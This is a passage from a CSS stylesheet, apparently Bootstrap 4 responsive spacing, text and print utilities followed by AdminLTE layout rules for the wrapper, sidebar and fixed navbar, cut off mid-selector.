.m-sm-0 {
margin: 0 !important;
}
.mt-sm-0,
.my-sm-0 {
margin-top: 0 !important;
}
.mr-sm-0,
.mx-sm-0 {
margin-right: 0 !important;
}
.mb-sm-0,
.my-sm-0 {
margin-bottom: 0 !important;
}
.ml-sm-0,
.mx-sm-0 {
margin-left: 0 !important;
}
.m-sm-1 {
margin: 0.25rem !important;
}
.mt-sm-1,
.my-sm-1 {
margin-top: 0.25rem !important;
}
.mr-sm-1,
.mx-sm-1 {
margin-right: 0.25rem !important;
}
.mb-sm-1,
.my-sm-1 {
margin-bottom: 0.25rem !important;
}
.ml-sm-1,
.mx-sm-1 {
margin-left: 0.25rem !important;
}
.m-sm-2 {
margin: 0.5rem !important;
}
.mt-sm-2,
.my-sm-2 {
margin-top: 0.5rem !important;
}
.mr-sm-2,
.mx-sm-2 {
margin-right: 0.5rem !important;
}
.mb-sm-2,
.my-sm-2 {
margin-bottom: 0.5rem !important;
}
.ml-sm-2,
.mx-sm-2 {
margin-left: 0.5rem !important;
}
.m-sm-3 {
margin: 1rem !important;
}
.mt-sm-3,
.my-sm-3 {
margin-top: 1rem !important;
}
.mr-sm-3,
.mx-sm-3 {
margin-right: 1rem !important;
}
.mb-sm-3,
.my-sm-3 {
margin-bottom: 1rem !important;
}
.ml-sm-3,
.mx-sm-3 {
margin-left: 1rem !important;
}
.m-sm-4 {
margin: 1.5rem !important;
}
.mt-sm-4,
.my-sm-4 {
margin-top: 1.5rem !important;
}
.mr-sm-4,
.mx-sm-4 {
margin-right: 1.5rem !important;
}
.mb-sm-4,
.my-sm-4 {
margin-bottom: 1.5rem !important;
}
.ml-sm-4,
.mx-sm-4 {
margin-left: 1.5rem !important;
}
.m-sm-5 {
margin: 3rem !important;
}
.mt-sm-5,
.my-sm-5 {
margin-top: 3rem !important;
}
.mr-sm-5,
.mx-sm-5 {
margin-right: 3rem !important;
}
.mb-sm-5,
.my-sm-5 {
margin-bottom: 3rem !important;
}
.ml-sm-5,
.mx-sm-5 {
margin-left: 3rem !important;
}
.p-sm-0 {
padding: 0 !important;
}
.pt-sm-0,
.py-sm-0 {
padding-top: 0 !important;
}
.pr-sm-0,
.px-sm-0 {
padding-right: 0 !important;
}
.pb-sm-0,
.py-sm-0 {
padding-bottom: 0 !important;
}
.pl-sm-0,
.px-sm-0 {
padding-left: 0 !important;
}
.p-sm-1 {
padding: 0.25rem !important;
}
.pt-sm-1,
.py-sm-1 {
padding-top: 0.25rem !important;
}
.pr-sm-1,
.px-sm-1 {
padding-right: 0.25rem !important;
}
.pb-sm-1,
.py-sm-1 {
padding-bottom: 0.25rem !important;
}
.pl-sm-1,
.px-sm-1 {
padding-left: 0.25rem !important;
}
.p-sm-2 {
padding: 0.5rem !important;
}
.pt-sm-2,
.py-sm-2 {
padding-top: 0.5rem !important;
}
.pr-sm-2,
.px-sm-2 {
padding-right: 0.5rem !important;
}
.pb-sm-2,
.py-sm-2 {
padding-bottom: 0.5rem !important;
}
.pl-sm-2,
.px-sm-2 {
padding-left: 0.5rem !important;
}
.p-sm-3 {
padding: 1rem !important;
}
.pt-sm-3,
.py-sm-3 {
padding-top: 1rem !important;
}
.pr-sm-3,
.px-sm-3 {
padding-right: 1rem !important;
}
.pb-sm-3,
.py-sm-3 {
padding-bottom: 1rem !important;
}
.pl-sm-3,
.px-sm-3 {
padding-left: 1rem !important;
}
.p-sm-4 {
padding: 1.5rem !important;
}
.pt-sm-4,
.py-sm-4 {
padding-top: 1.5rem !important;
}
.pr-sm-4,
.px-sm-4 {
padding-right: 1.5rem !important;
}
.pb-sm-4,
.py-sm-4 {
padding-bottom: 1.5rem !important;
}
.pl-sm-4,
.px-sm-4 {
padding-left: 1.5rem !important;
}
.p-sm-5 {
padding: 3rem !important;
}
.pt-sm-5,
.py-sm-5 {
padding-top: 3rem !important;
}
.pr-sm-5,
.px-sm-5 {
padding-right: 3rem !important;
}
.pb-sm-5,
.py-sm-5 {
padding-bottom: 3rem !important;
}
.pl-sm-5,
.px-sm-5 {
padding-left: 3rem !important;
}
.m-sm-n1 {
margin: -0.25rem !important;
}
.mt-sm-n1,
.my-sm-n1 {
margin-top: -0.25rem !important;
}
.mr-sm-n1,
.mx-sm-n1 {
margin-right: -0.25rem !important;
}
.mb-sm-n1,
.my-sm-n1 {
margin-bottom: -0.25rem !important;
}
.ml-sm-n1,
.mx-sm-n1 {
margin-left: -0.25rem !important;
}
.m-sm-n2 {
margin: -0.5rem !important;
}
.mt-sm-n2,
.my-sm-n2 {
margin-top: -0.5rem !important;
}
.mr-sm-n2,
.mx-sm-n2 {
margin-right: -0.5rem !important;
}
.mb-sm-n2,
.my-sm-n2 {
margin-bottom: -0.5rem !important;
}
.ml-sm-n2,
.mx-sm-n2 {
margin-left: -0.5rem !important;
}
.m-sm-n3 {
margin: -1rem !important;
}
.mt-sm-n3,
.my-sm-n3 {
margin-top: -1rem !important;
}
.mr-sm-n3,
.mx-sm-n3 {
margin-right: -1rem !important;
}
.mb-sm-n3,
.my-sm-n3 {
margin-bottom: -1rem !important;
}
.ml-sm-n3,
.mx-sm-n3 {
margin-left: -1rem !important;
}
.m-sm-n4 {
margin: -1.5rem !important;
}
.mt-sm-n4,
.my-sm-n4 {
margin-top: -1.5rem !important;
}
.mr-sm-n4,
.mx-sm-n4 {
margin-right: -1.5rem !important;
}
.mb-sm-n4,
.my-sm-n4 {
margin-bottom: -1.5rem !important;
}
.ml-sm-n4,
.mx-sm-n4 {
margin-left: -1.5rem !important;
}
.m-sm-n5 {
margin: -3rem !important;
}
.mt-sm-n5,
.my-sm-n5 {
margin-top: -3rem !important;
}
.mr-sm-n5,
.mx-sm-n5 {
margin-right: -3rem !important;
}
.mb-sm-n5,
.my-sm-n5 {
margin-bottom: -3rem !important;
}
.ml-sm-n5,
.mx-sm-n5 {
margin-left: -3rem !important;
}
.m-sm-auto {
margin: auto !important;
}
.mt-sm-auto,
.my-sm-auto {
margin-top: auto !important;
}
.mr-sm-auto,
.mx-sm-auto {
margin-right: auto !important;
}
.mb-sm-auto,
.my-sm-auto {
margin-bottom: auto !important;
}
.ml-sm-auto,
.mx-sm-auto {
margin-left: auto !important;
}
}
@media (min-width: 768px) {
.m-md-0 {
margin: 0 !important;
}
.mt-md-0,
.my-md-0 {
margin-top: 0 !important;
}
.mr-md-0,
.mx-md-0 {
margin-right: 0 !important;
}
.mb-md-0,
.my-md-0 {
margin-bottom: 0 !important;
}
.ml-md-0,
.mx-md-0 {
margin-left: 0 !important;
}
.m-md-1 {
margin: 0.25rem !important;
}
.mt-md-1,
.my-md-1 {
margin-top: 0.25rem !important;
}
.mr-md-1,
.mx-md-1 {
margin-right: 0.25rem !important;
}
.mb-md-1,
.my-md-1 {
margin-bottom: 0.25rem !important;
}
.ml-md-1,
.mx-md-1 {
margin-left: 0.25rem !important;
}
.m-md-2 {
margin: 0.5rem !important;
}
.mt-md-2,
.my-md-2 {
margin-top: 0.5rem !important;
}
.mr-md-2,
.mx-md-2 {
margin-right: 0.5rem !important;
}
.mb-md-2,
.my-md-2 {
margin-bottom: 0.5rem !important;
}
.ml-md-2,
.mx-md-2 {
margin-left: 0.5rem !important;
}
.m-md-3 {
margin: 1rem !important;
}
.mt-md-3,
.my-md-3 {
margin-top: 1rem !important;
}
.mr-md-3,
.mx-md-3 {
margin-right: 1rem !important;
}
.mb-md-3,
.my-md-3 {
margin-bottom: 1rem !important;
}
.ml-md-3,
.mx-md-3 {
margin-left: 1rem !important;
}
.m-md-4 {
margin: 1.5rem !important;
}
.mt-md-4,
.my-md-4 {
margin-top: 1.5rem !important;
}
.mr-md-4,
.mx-md-4 {
margin-right: 1.5rem !important;
}
.mb-md-4,
.my-md-4 {
margin-bottom: 1.5rem !important;
}
.ml-md-4,
.mx-md-4 {
margin-left: 1.5rem !important;
}
.m-md-5 {
margin: 3rem !important;
}
.mt-md-5,
.my-md-5 {
margin-top: 3rem !important;
}
.mr-md-5,
.mx-md-5 {
margin-right: 3rem !important;
}
.mb-md-5,
.my-md-5 {
margin-bottom: 3rem !important;
}
.ml-md-5,
.mx-md-5 {
margin-left: 3rem !important;
}
.p-md-0 {
padding: 0 !important;
}
.pt-md-0,
.py-md-0 {
padding-top: 0 !important;
}
.pr-md-0,
.px-md-0 {
padding-right: 0 !important;
}
.pb-md-0,
.py-md-0 {
padding-bottom: 0 !important;
}
.pl-md-0,
.px-md-0 {
padding-left: 0 !important;
}
.p-md-1 {
padding: 0.25rem !important;
}
.pt-md-1,
.py-md-1 {
padding-top: 0.25rem !important;
}
.pr-md-1,
.px-md-1 {
padding-right: 0.25rem !important;
}
.pb-md-1,
.py-md-1 {
padding-bottom: 0.25rem !important;
}
.pl-md-1,
.px-md-1 {
padding-left: 0.25rem !important;
}
.p-md-2 {
padding: 0.5rem !important;
}
.pt-md-2,
.py-md-2 {
padding-top: 0.5rem !important;
}
.pr-md-2,
.px-md-2 {
padding-right: 0.5rem !important;
}
.pb-md-2,
.py-md-2 {
padding-bottom: 0.5rem !important;
}
.pl-md-2,
.px-md-2 {
padding-left: 0.5rem !important;
}
.p-md-3 {
padding: 1rem !important;
}
.pt-md-3,
.py-md-3 {
padding-top: 1rem !important;
}
.pr-md-3,
.px-md-3 {
padding-right: 1rem !important;
}
.pb-md-3,
.py-md-3 {
padding-bottom: 1rem !important;
}
.pl-md-3,
.px-md-3 {
padding-left: 1rem !important;
}
.p-md-4 {
padding: 1.5rem !important;
}
.pt-md-4,
.py-md-4 {
padding-top: 1.5rem !important;
}
.pr-md-4,
.px-md-4 {
padding-right: 1.5rem !important;
}
.pb-md-4,
.py-md-4 {
padding-bottom: 1.5rem !important;
}
.pl-md-4,
.px-md-4 {
padding-left: 1.5rem !important;
}
.p-md-5 {
padding: 3rem !important;
}
.pt-md-5,
.py-md-5 {
padding-top: 3rem !important;
}
.pr-md-5,
.px-md-5 {
padding-right: 3rem !important;
}
.pb-md-5,
.py-md-5 {
padding-bottom: 3rem !important;
}
.pl-md-5,
.px-md-5 {
padding-left: 3rem !important;
}
.m-md-n1 {
margin: -0.25rem !important;
}
.mt-md-n1,
.my-md-n1 {
margin-top: -0.25rem !important;
}
.mr-md-n1,
.mx-md-n1 {
margin-right: -0.25rem !important;
}
.mb-md-n1,
.my-md-n1 {
margin-bottom: -0.25rem !important;
}
.ml-md-n1,
.mx-md-n1 {
margin-left: -0.25rem !important;
}
.m-md-n2 {
margin: -0.5rem !important;
}
.mt-md-n2,
.my-md-n2 {
margin-top: -0.5rem !important;
}
.mr-md-n2,
.mx-md-n2 {
margin-right: -0.5rem !important;
}
.mb-md-n2,
.my-md-n2 {
margin-bottom: -0.5rem !important;
}
.ml-md-n2,
.mx-md-n2 {
margin-left: -0.5rem !important;
}
.m-md-n3 {
margin: -1rem !important;
}
.mt-md-n3,
.my-md-n3 {
margin-top: -1rem !important;
}
.mr-md-n3,
.mx-md-n3 {
margin-right: -1rem !important;
}
.mb-md-n3,
.my-md-n3 {
margin-bottom: -1rem !important;
}
.ml-md-n3,
.mx-md-n3 {
margin-left: -1rem !important;
}
.m-md-n4 {
margin: -1.5rem !important;
}
.mt-md-n4,
.my-md-n4 {
margin-top: -1.5rem !important;
}
.mr-md-n4,
.mx-md-n4 {
margin-right: -1.5rem !important;
}
.mb-md-n4,
.my-md-n4 {
margin-bottom: -1.5rem !important;
}
.ml-md-n4,
.mx-md-n4 {
margin-left: -1.5rem !important;
}
.m-md-n5 {
margin: -3rem !important;
}
.mt-md-n5,
.my-md-n5 {
margin-top: -3rem !important;
}
.mr-md-n5,
.mx-md-n5 {
margin-right: -3rem !important;
}
.mb-md-n5,
.my-md-n5 {
margin-bottom: -3rem !important;
}
.ml-md-n5,
.mx-md-n5 {
margin-left: -3rem !important;
}
.m-md-auto {
margin: auto !important;
}
.mt-md-auto,
.my-md-auto {
margin-top: auto !important;
}
.mr-md-auto,
.mx-md-auto {
margin-right: auto !important;
}
.mb-md-auto,
.my-md-auto {
margin-bottom: auto !important;
}
.ml-md-auto,
.mx-md-auto {
margin-left: auto !important;
}
}
@media (min-width: 992px) {
.m-lg-0 {
margin: 0 !important;
}
.mt-lg-0,
.my-lg-0 {
margin-top: 0 !important;
}
.mr-lg-0,
.mx-lg-0 {
margin-right: 0 !important;
}
.mb-lg-0,
.my-lg-0 {
margin-bottom: 0 !important;
}
.ml-lg-0,
.mx-lg-0 {
margin-left: 0 !important;
}
.m-lg-1 {
margin: 0.25rem !important;
}
.mt-lg-1,
.my-lg-1 {
margin-top: 0.25rem !important;
}
.mr-lg-1,
.mx-lg-1 {
margin-right: 0.25rem !important;
}
.mb-lg-1,
.my-lg-1 {
margin-bottom: 0.25rem !important;
}
.ml-lg-1,
.mx-lg-1 {
margin-left: 0.25rem !important;
}
.m-lg-2 {
margin: 0.5rem !important;
}
.mt-lg-2,
.my-lg-2 {
margin-top: 0.5rem !important;
}
.mr-lg-2,
.mx-lg-2 {
margin-right: 0.5rem !important;
}
.mb-lg-2,
.my-lg-2 {
margin-bottom: 0.5rem !important;
}
.ml-lg-2,
.mx-lg-2 {
margin-left: 0.5rem !important;
}
.m-lg-3 {
margin: 1rem !important;
}
.mt-lg-3,
.my-lg-3 {
margin-top: 1rem !important;
}
.mr-lg-3,
.mx-lg-3 {
margin-right: 1rem !important;
}
.mb-lg-3,
.my-lg-3 {
margin-bottom: 1rem !important;
}
.ml-lg-3,
.mx-lg-3 {
margin-left: 1rem !important;
}
.m-lg-4 {
margin: 1.5rem !important;
}
.mt-lg-4,
.my-lg-4 {
margin-top: 1.5rem !important;
}
.mr-lg-4,
.mx-lg-4 {
margin-right: 1.5rem !important;
}
.mb-lg-4,
.my-lg-4 {
margin-bottom: 1.5rem !important;
}
.ml-lg-4,
.mx-lg-4 {
margin-left: 1.5rem !important;
}
.m-lg-5 {
margin: 3rem !important;
}
.mt-lg-5,
.my-lg-5 {
margin-top: 3rem !important;
}
.mr-lg-5,
.mx-lg-5 {
margin-right: 3rem !important;
}
.mb-lg-5,
.my-lg-5 {
margin-bottom: 3rem !important;
}
.ml-lg-5,
.mx-lg-5 {
margin-left: 3rem !important;
}
.p-lg-0 {
padding: 0 !important;
}
.pt-lg-0,
.py-lg-0 {
padding-top: 0 !important;
}
.pr-lg-0,
.px-lg-0 {
padding-right: 0 !important;
}
.pb-lg-0,
.py-lg-0 {
padding-bottom: 0 !important;
}
.pl-lg-0,
.px-lg-0 {
padding-left: 0 !important;
}
.p-lg-1 {
padding: 0.25rem !important;
}
.pt-lg-1,
.py-lg-1 {
padding-top: 0.25rem !important;
}
.pr-lg-1,
.px-lg-1 {
padding-right: 0.25rem !important;
}
.pb-lg-1,
.py-lg-1 {
padding-bottom: 0.25rem !important;
}
.pl-lg-1,
.px-lg-1 {
padding-left: 0.25rem !important;
}
.p-lg-2 {
padding: 0.5rem !important;
}
.pt-lg-2,
.py-lg-2 {
padding-top: 0.5rem !important;
}
.pr-lg-2,
.px-lg-2 {
padding-right: 0.5rem !important;
}
.pb-lg-2,
.py-lg-2 {
padding-bottom: 0.5rem !important;
}
.pl-lg-2,
.px-lg-2 {
padding-left: 0.5rem !important;
}
.p-lg-3 {
padding: 1rem !important;
}
.pt-lg-3,
.py-lg-3 {
padding-top: 1rem !important;
}
.pr-lg-3,
.px-lg-3 {
padding-right: 1rem !important;
}
.pb-lg-3,
.py-lg-3 {
padding-bottom: 1rem !important;
}
.pl-lg-3,
.px-lg-3 {
padding-left: 1rem !important;
}
.p-lg-4 {
padding: 1.5rem !important;
}
.pt-lg-4,
.py-lg-4 {
padding-top: 1.5rem !important;
}
.pr-lg-4,
.px-lg-4 {
padding-right: 1.5rem !important;
}
.pb-lg-4,
.py-lg-4 {
padding-bottom: 1.5rem !important;
}
.pl-lg-4,
.px-lg-4 {
padding-left: 1.5rem !important;
}
.p-lg-5 {
padding: 3rem !important;
}
.pt-lg-5,
.py-lg-5 {
padding-top: 3rem !important;
}
.pr-lg-5,
.px-lg-5 {
padding-right: 3rem !important;
}
.pb-lg-5,
.py-lg-5 {
padding-bottom: 3rem !important;
}
.pl-lg-5,
.px-lg-5 {
padding-left: 3rem !important;
}
.m-lg-n1 {
margin: -0.25rem !important;
}
.mt-lg-n1,
.my-lg-n1 {
margin-top: -0.25rem !important;
}
.mr-lg-n1,
.mx-lg-n1 {
margin-right: -0.25rem !important;
}
.mb-lg-n1,
.my-lg-n1 {
margin-bottom: -0.25rem !important;
}
.ml-lg-n1,
.mx-lg-n1 {
margin-left: -0.25rem !important;
}
.m-lg-n2 {
margin: -0.5rem !important;
}
.mt-lg-n2,
.my-lg-n2 {
margin-top: -0.5rem !important;
}
.mr-lg-n2,
.mx-lg-n2 {
margin-right: -0.5rem !important;
}
.mb-lg-n2,
.my-lg-n2 {
margin-bottom: -0.5rem !important;
}
.ml-lg-n2,
.mx-lg-n2 {
margin-left: -0.5rem !important;
}
.m-lg-n3 {
margin: -1rem !important;
}
.mt-lg-n3,
.my-lg-n3 {
margin-top: -1rem !important;
}
.mr-lg-n3,
.mx-lg-n3 {
margin-right: -1rem !important;
}
.mb-lg-n3,
.my-lg-n3 {
margin-bottom: -1rem !important;
}
.ml-lg-n3,
.mx-lg-n3 {
margin-left: -1rem !important;
}
.m-lg-n4 {
margin: -1.5rem !important;
}
.mt-lg-n4,
.my-lg-n4 {
margin-top: -1.5rem !important;
}
.mr-lg-n4,
.mx-lg-n4 {
margin-right: -1.5rem !important;
}
.mb-lg-n4,
.my-lg-n4 {
margin-bottom: -1.5rem !important;
}
.ml-lg-n4,
.mx-lg-n4 {
margin-left: -1.5rem !important;
}
.m-lg-n5 {
margin: -3rem !important;
}
.mt-lg-n5,
.my-lg-n5 {
margin-top: -3rem !important;
}
.mr-lg-n5,
.mx-lg-n5 {
margin-right: -3rem !important;
}
.mb-lg-n5,
.my-lg-n5 {
margin-bottom: -3rem !important;
}
.ml-lg-n5,
.mx-lg-n5 {
margin-left: -3rem !important;
}
.m-lg-auto {
margin: auto !important;
}
.mt-lg-auto,
.my-lg-auto {
margin-top: auto !important;
}
.mr-lg-auto,
.mx-lg-auto {
margin-right: auto !important;
}
.mb-lg-auto,
.my-lg-auto {
margin-bottom: auto !important;
}
.ml-lg-auto,
.mx-lg-auto {
margin-left: auto !important;
}
}
@media (min-width: 1200px) {
.m-xl-0 {
margin: 0 !important;
}
.mt-xl-0,
.my-xl-0 {
margin-top: 0 !important;
}
.mr-xl-0,
.mx-xl-0 {
margin-right: 0 !important;
}
.mb-xl-0,
.my-xl-0 {
margin-bottom: 0 !important;
}
.ml-xl-0,
.mx-xl-0 {
margin-left: 0 !important;
}
.m-xl-1 {
margin: 0.25rem !important;
}
.mt-xl-1,
.my-xl-1 {
margin-top: 0.25rem !important;
}
.mr-xl-1,
.mx-xl-1 {
margin-right: 0.25rem !important;
}
.mb-xl-1,
.my-xl-1 {
margin-bottom: 0.25rem !important;
}
.ml-xl-1,
.mx-xl-1 {
margin-left: 0.25rem !important;
}
.m-xl-2 {
margin: 0.5rem !important;
}
.mt-xl-2,
.my-xl-2 {
margin-top: 0.5rem !important;
}
.mr-xl-2,
.mx-xl-2 {
margin-right: 0.5rem !important;
}
.mb-xl-2,
.my-xl-2 {
margin-bottom: 0.5rem !important;
}
.ml-xl-2,
.mx-xl-2 {
margin-left: 0.5rem !important;
}
.m-xl-3 {
margin: 1rem !important;
}
.mt-xl-3,
.my-xl-3 {
margin-top: 1rem !important;
}
.mr-xl-3,
.mx-xl-3 {
margin-right: 1rem !important;
}
.mb-xl-3,
.my-xl-3 {
margin-bottom: 1rem !important;
}
.ml-xl-3,
.mx-xl-3 {
margin-left: 1rem !important;
}
.m-xl-4 {
margin: 1.5rem !important;
}
.mt-xl-4,
.my-xl-4 {
margin-top: 1.5rem !important;
}
.mr-xl-4,
.mx-xl-4 {
margin-right: 1.5rem !important;
}
.mb-xl-4,
.my-xl-4 {
margin-bottom: 1.5rem !important;
}
.ml-xl-4,
.mx-xl-4 {
margin-left: 1.5rem !important;
}
.m-xl-5 {
margin: 3rem !important;
}
.mt-xl-5,
.my-xl-5 {
margin-top: 3rem !important;
}
.mr-xl-5,
.mx-xl-5 {
margin-right: 3rem !important;
}
.mb-xl-5,
.my-xl-5 {
margin-bottom: 3rem !important;
}
.ml-xl-5,
.mx-xl-5 {
margin-left: 3rem !important;
}
.p-xl-0 {
padding: 0 !important;
}
.pt-xl-0,
.py-xl-0 {
padding-top: 0 !important;
}
.pr-xl-0,
.px-xl-0 {
padding-right: 0 !important;
}
.pb-xl-0,
.py-xl-0 {
padding-bottom: 0 !important;
}
.pl-xl-0,
.px-xl-0 {
padding-left: 0 !important;
}
.p-xl-1 {
padding: 0.25rem !important;
}
.pt-xl-1,
.py-xl-1 {
padding-top: 0.25rem !important;
}
.pr-xl-1,
.px-xl-1 {
padding-right: 0.25rem !important;
}
.pb-xl-1,
.py-xl-1 {
padding-bottom: 0.25rem !important;
}
.pl-xl-1,
.px-xl-1 {
padding-left: 0.25rem !important;
}
.p-xl-2 {
padding: 0.5rem !important;
}
.pt-xl-2,
.py-xl-2 {
padding-top: 0.5rem !important;
}
.pr-xl-2,
.px-xl-2 {
padding-right: 0.5rem !important;
}
.pb-xl-2,
.py-xl-2 {
padding-bottom: 0.5rem !important;
}
.pl-xl-2,
.px-xl-2 {
padding-left: 0.5rem !important;
}
.p-xl-3 {
padding: 1rem !important;
}
.pt-xl-3,
.py-xl-3 {
padding-top: 1rem !important;
}
.pr-xl-3,
.px-xl-3 {
padding-right: 1rem !important;
}
.pb-xl-3,
.py-xl-3 {
padding-bottom: 1rem !important;
}
.pl-xl-3,
.px-xl-3 {
padding-left: 1rem !important;
}
.p-xl-4 {
padding: 1.5rem !important;
}
.pt-xl-4,
.py-xl-4 {
padding-top: 1.5rem !important;
}
.pr-xl-4,
.px-xl-4 {
padding-right: 1.5rem !important;
}
.pb-xl-4,
.py-xl-4 {
padding-bottom: 1.5rem !important;
}
.pl-xl-4,
.px-xl-4 {
padding-left: 1.5rem !important;
}
.p-xl-5 {
padding: 3rem !important;
}
.pt-xl-5,
.py-xl-5 {
padding-top: 3rem !important;
}
.pr-xl-5,
.px-xl-5 {
padding-right: 3rem !important;
}
.pb-xl-5,
.py-xl-5 {
padding-bottom: 3rem !important;
}
.pl-xl-5,
.px-xl-5 {
padding-left: 3rem !important;
}
.m-xl-n1 {
margin: -0.25rem !important;
}
.mt-xl-n1,
.my-xl-n1 {
margin-top: -0.25rem !important;
}
.mr-xl-n1,
.mx-xl-n1 {
margin-right: -0.25rem !important;
}
.mb-xl-n1,
.my-xl-n1 {
margin-bottom: -0.25rem !important;
}
.ml-xl-n1,
.mx-xl-n1 {
margin-left: -0.25rem !important;
}
.m-xl-n2 {
margin: -0.5rem !important;
}
.mt-xl-n2,
.my-xl-n2 {
margin-top: -0.5rem !important;
}
.mr-xl-n2,
.mx-xl-n2 {
margin-right: -0.5rem !important;
}
.mb-xl-n2,
.my-xl-n2 {
margin-bottom: -0.5rem !important;
}
.ml-xl-n2,
.mx-xl-n2 {
margin-left: -0.5rem !important;
}
.m-xl-n3 {
margin: -1rem !important;
}
.mt-xl-n3,
.my-xl-n3 {
margin-top: -1rem !important;
}
.mr-xl-n3,
.mx-xl-n3 {
margin-right: -1rem !important;
}
.mb-xl-n3,
.my-xl-n3 {
margin-bottom: -1rem !important;
}
.ml-xl-n3,
.mx-xl-n3 {
margin-left: -1rem !important;
}
.m-xl-n4 {
margin: -1.5rem !important;
}
.mt-xl-n4,
.my-xl-n4 {
margin-top: -1.5rem !important;
}
.mr-xl-n4,
.mx-xl-n4 {
margin-right: -1.5rem !important;
}
.mb-xl-n4,
.my-xl-n4 {
margin-bottom: -1.5rem !important;
}
.ml-xl-n4,
.mx-xl-n4 {
margin-left: -1.5rem !important;
}
.m-xl-n5 {
margin: -3rem !important;
}
.mt-xl-n5,
.my-xl-n5 {
margin-top: -3rem !important;
}
.mr-xl-n5,
.mx-xl-n5 {
margin-right: -3rem !important;
}
.mb-xl-n5,
.my-xl-n5 {
margin-bottom: -3rem !important;
}
.ml-xl-n5,
.mx-xl-n5 {
margin-left: -3rem !important;
}
.m-xl-auto {
margin: auto !important;
}
.mt-xl-auto,
.my-xl-auto {
margin-top: auto !important;
}
.mr-xl-auto,
.mx-xl-auto {
margin-right: auto !important;
}
.mb-xl-auto,
.my-xl-auto {
margin-bottom: auto !important;
}
.ml-xl-auto,
.mx-xl-auto {
margin-left: auto !important;
}
}
.text-monospace {
font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace !important;
}
.text-justify {
text-align: justify !important;
}
.text-wrap {
white-space: normal !important;
}
.text-nowrap {
white-space: nowrap !important;
}
.text-truncate {
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.text-left {
text-align: left !important;
}
.text-right {
text-align: right !important;
}
.text-center {
text-align: center !important;
}
@media (min-width: 576px) {
.text-sm-left {
text-align: left !important;
}
.text-sm-right {
text-align: right !important;
}
.text-sm-center {
text-align: center !important;
}
}
@media (min-width: 768px) {
.text-md-left {
text-align: left !important;
}
.text-md-right {
text-align: right !important;
}
.text-md-center {
text-align: center !important;
}
}
@media (min-width: 992px) {
.text-lg-left {
text-align: left !important;
}
.text-lg-right {
text-align: right !important;
}
.text-lg-center {
text-align: center !important;
}
}
@media (min-width: 1200px) {
.text-xl-left {
text-align: left !important;
}
.text-xl-right {
text-align: right !important;
}
.text-xl-center {
text-align: center !important;
}
}
.text-lowercase {
text-transform: lowercase !important;
}
.text-uppercase {
text-transform: uppercase !important;
}
.text-capitalize {
text-transform: capitalize !important;
}
.font-weight-light {
font-weight: 300 !important;
}
.font-weight-lighter {
font-weight: lighter !important;
}
.font-weight-normal {
font-weight: 400 !important;
}
.font-weight-bold {
font-weight: 700 !important;
}
.font-weight-bolder {
font-weight: bolder !important;
}
.font-italic {
font-style: italic !important;
}
.text-white {
color: #ffffff !important;
}
.text-primary {
color: #007bff !important;
}
a.text-primary:hover, a.text-primary:focus {
color: #0056b3 !important;
}
.text-secondary {
color: #6c757d !important;
}
a.text-secondary:hover, a.text-secondary:focus {
color: #494f54 !important;
}
.text-success {
color: #28a745 !important;
}
a.text-success:hover, a.text-success:focus {
color: #19692c !important;
}
.text-info {
color: #17a2b8 !important;
}
a.text-info:hover, a.text-info:focus {
color: #0f6674 !important;
}
.text-warning {
color: #ffc107 !important;
}
a.text-warning:hover, a.text-warning:focus {
color: #ba8b00 !important;
}
.text-danger {
color: #dc3545 !important;
}
a.text-danger:hover, a.text-danger:focus {
color: #a71d2a !important;
}
.text-light {
color: #f8f9fa !important;
}
a.text-light:hover, a.text-light:focus {
color: #cbd3da !important;
}
.text-dark {
color: #343a40 !important;
}
a.text-dark:hover, a.text-dark:focus {
color: #121416 !important;
}
.text-body {
color: #212529 !important;
}
.text-muted {
color: #6c757d !important;
}
.text-black-50 {
color: rgba(0, 0, 0, 0.5) !important;
}
.text-white-50 {
color: rgba(255, 255, 255, 0.5) !important;
}
.text-hide {
font: 0/0 a;
color: transparent;
text-shadow: none;
background-color: transparent;
border: 0;
}
.text-decoration-none {
text-decoration: none !important;
}
.text-break {
word-break: break-word !important;
overflow-wrap: break-word !important;
}
.text-reset {
color: inherit !important;
}
.visible {
visibility: visible !important;
}
.invisible {
visibility: hidden !important;
}
@media print {
*,
*::before,
*::after {
text-shadow: none !important;
box-shadow: none !important;
}
a:not(.btn) {
text-decoration: underline;
}
abbr[title]::after {
content: " (" attr(title) ")";
}
pre {
white-space: pre-wrap !important;
}
pre,
blockquote {
border: 1px solid #adb5bd;
page-break-inside: avoid;
}
thead {
display: table-header-group;
}
tr,
img {
page-break-inside: avoid;
}
p,
h2,
h3 {
orphans: 3;
widows: 3;
}
h2,
h3 {
page-break-after: avoid;
}
@page {
size: a3;
}
body {
min-width: 992px !important;
}
.container {
min-width: 992px !important;
}
.navbar {
display: none;
}
.badge {
border: 1px solid #000;
}
.table {
border-collapse: collapse !important;
}
.table td,
.table th {
background-color: #ffffff !important;
}
.table-bordered th,
.table-bordered td {
border: 1px solid #dee2e6 !important;
}
.table-dark {
color: inherit;
}
.table-dark th,
.table-dark td,
.table-dark thead th,
.table-dark tbody + tbody {
border-color: #dee2e6;
}
.table .thead-dark th {
color: inherit;
border-color: #dee2e6;
}
}
html {
scroll-behavior: smooth;
}
html,
body,
.wrapper {
min-height: 100%;
}
.wrapper {
position: relative;
}
.wrapper .content-wrapper {
min-height: calc(100vh - calc(3.5rem + 1px) - calc(3.5rem + 1px));
}
.layout-boxed .wrapper {
box-shadow: 0 0 10 rgba(0, 0, 0, 0.3);
}
.layout-boxed .wrapper, .layout-boxed .wrapper::before {
margin: 0 auto;
max-width: 1250px;
}
.layout-boxed .wrapper .main-sidebar {
left: inherit;
}
.layout-fixed .wrapper .sidebar {
height: calc(100vh - (3.5rem + 1px));
}
.layout-fixed.text-sm .wrapper .sidebar {
height: calc(100vh - (2.93725rem + 1px));
}
.layout-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.layout-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.layout-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.sidebar-mini.sidebar-collapse .wrapper .brand-link,
